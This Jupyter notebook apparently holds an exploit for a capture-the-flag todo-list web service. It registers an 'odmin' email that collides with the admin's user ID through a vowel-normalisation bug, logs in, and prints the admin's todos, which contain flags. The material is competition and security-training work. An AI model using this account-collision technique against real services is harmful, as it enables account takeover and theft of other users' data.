In [ ]:
import logging
import random
import string
from bs4 import BeautifulSoup
from typing import List
import requests

def generate_random_password(length: int, seed: int, special_char=False) -> str:
    myrandom = random.Random(seed)
    # Define the character set: lowercase letters, uppercase letters, and digits
    characters = string.ascii_letters + string.digits
    if special_char:
        characters += string.punctuation
    # Use random.choices to select random characters from the character set
    random_string = ''.join(myrandom.choices(characters, k=length))
    return random_string

def extract_verification_token(html_content: str):
    soup = BeautifulSoup(html_content, "html.parser")
    return soup.find("input", {"name": "__RequestVerificationToken"})["value"]


def extract_todos(html_content: str) -> List[str]:
    """
    :param html_content: s.get(list_todos_url).text
    :return: list of todo descriptions
    """
    # Parse the HTML content using Beautiful Soup
    soup = BeautifulSoup(html_content, "html.parser")

    # Find all <p> elements within the main container where todos are listed
    todos = []
    for div in soup.find_all('div', class_='todo-description'):  # TODO check if this still only filters for todos
        todos.append(div.get_text(strip=True))
    return todos


def extract_filters(html_content: str):
    soup = BeautifulSoup(html_content, "html.parser")
    # Find all <p> elements within the main container where todos are listed
    filters_dict = {}
    filters = soup.find_all('option', class_='filter')
    if not isinstance(filters, list):
        filters = [filters]
    for f in filters:
        if "value" in f.attrs:
            filters_dict[f.get_text()] = f.attrs["value"]
    return filters_dict


class Exploit():
    def __init__(self, ip: str, email: str):
        self.ip = ip
        self.email = email
        self.team = 42
        self.password = f"{generate_random_password(40, self.team ,True)}"
        self.web_app_port = 8080
        self.base_url = f'http://[{ip}]:{self.web_app_port}/'
        self.register_url = self.base_url + 'Identity/Account/Register'
        self.login_url = self.base_url + 'Identity/Account/Login'
        self.list_todos_url = self.base_url + 'Todo/ListTodos'
        self.add_todo_url = self.base_url + 'Todo/AddTodo'
        self.import_url = self.base_url + 'Todo/Import'
        self.export_url = self.base_url + 'Todo/Export'
        self.add_filter_url = self.base_url + "Todo/AddFilter"
        self.apply_filter_url = self.base_url + "Todo/ApplyFilter"
        self.logout_url = self.base_url + 'Identity/Account/Logout'
        self.session = requests.Session()

        logging.info(f"ip: {ip}, team: {self.team}")
        logging.info(f"email: {self.email}, password: {self.password}")
        self.register_user()

    def register_user(self):
        r = self.session.get(self.register_url)
        data = {"Input.Email": self.email,
                "Input.Password": self.password,
                "Input.ConfirmPassword": self.password,
                "__RequestVerificationToken": extract_verification_token(r.text)}
        r2 = self.session.post(self.register_url, data=data)
        if "is already taken." in r2.text:
            print(f"{self.email} already taken")

    def login(self):
        r = self.session.get(self.login_url)
        data = {"Input.Email": self.email,
                "Input.Password": self.password,
                "__RequestVerificationToken": extract_verification_token(r.text),
                "Input.RememberMe": "True"}
        r2 = self.session.post(self.login_url, data=data)
        if "Invalid login attempt." in r2.text:
            logging.error(f"{self.email} {self.password}   :   invalid login attempt")

    def get_todos(self) -> List[str]:
        r = self.session.get(self.list_todos_url)
        return extract_todos(r.text)

In [24]:
ip = '::1'
email = 'odmin@todo-list-service-hadfo.de' #vocals can be interchanged arbitrarily, since they get replaced with the number 1 in the UserManager.GetUserId method 

In [25]:
exploiter = Exploit(ip, email)

In [26]:
exploiter.login()

In [47]:
exploiter.get_todos()

['FLAG_Q1RGLUdBTUVTRVJ8RVi1tLpcJyChhd0n',
 'FLAG_Q1RGLUdBTx1TRVJ8RVgu9gkvlLPecSVg']